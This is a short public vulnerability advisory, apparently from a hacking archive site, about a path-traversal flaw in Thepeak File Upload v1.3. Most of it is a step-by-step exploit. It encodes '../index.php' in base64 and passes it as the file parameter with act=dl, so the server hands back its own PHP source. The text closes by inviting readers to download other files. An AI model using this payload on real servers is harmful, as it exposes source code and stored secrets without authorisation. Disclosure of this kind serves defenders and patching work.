AOH :: HP Unsorted T :: B06-5460.HTM

Thepeak File Upload v1.3 : Read file vulneability



Thepeak File Upload v1.3 : Read file vulneability
Thepeak File Upload v1.3 : Read file vulneability



Thepeak File Upload v1.3 : Read file vulneability
Discovered By: Phạm Đức Hải (Pham Duc Hai)
Email: duchaikhtn (at) gmail (dot) com
YIM : kiki_coco1985vn
Website: http://blog.ajaxviet.com 
-------------------------
Description:
file upload manager 1.3
written by thepeak (adam medici)
copyright (c) 2003 thepeak of mtnpeak.net
A simple, powerful tool to upload and manage files using your web browser.

There are some bugs in Thepeak File Upload v1.3 :
http://www.securityfocus.com/archive/1/378494 
Today, I find out a bug in Thepeak File Upload v1.3 , this bug allows attacker
can download source file(.php,...) from server.
-------------------------
Exploit :
http://somesite.com/example/index.php --> upload form 
Now, we upload one file to server, ex : test.jpg -->ok
We have its url to view it : http://somesite.com/example/index.php?act=view&file=dGVzdC5qcGcanh url to download it : http://somesite.com/example/index.php?act=dl&file=dGVzdC5qcGcNotice that the value "dGVzdC5qcGc=" of parameter file is encoded 64 of " test.jpg" 
We need get source file http://somesite.com/index.php. 
Encode 64 path to index.php above : ../index.php --> Li4vaW5kZXgucGhw
==> we have the link to download source file index.php (notice act=dl)

http://somesite.com/example/index.php?act=dl&file=Li4vaW5kZXgucGhw 

You can also download other files.
Have fun!

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.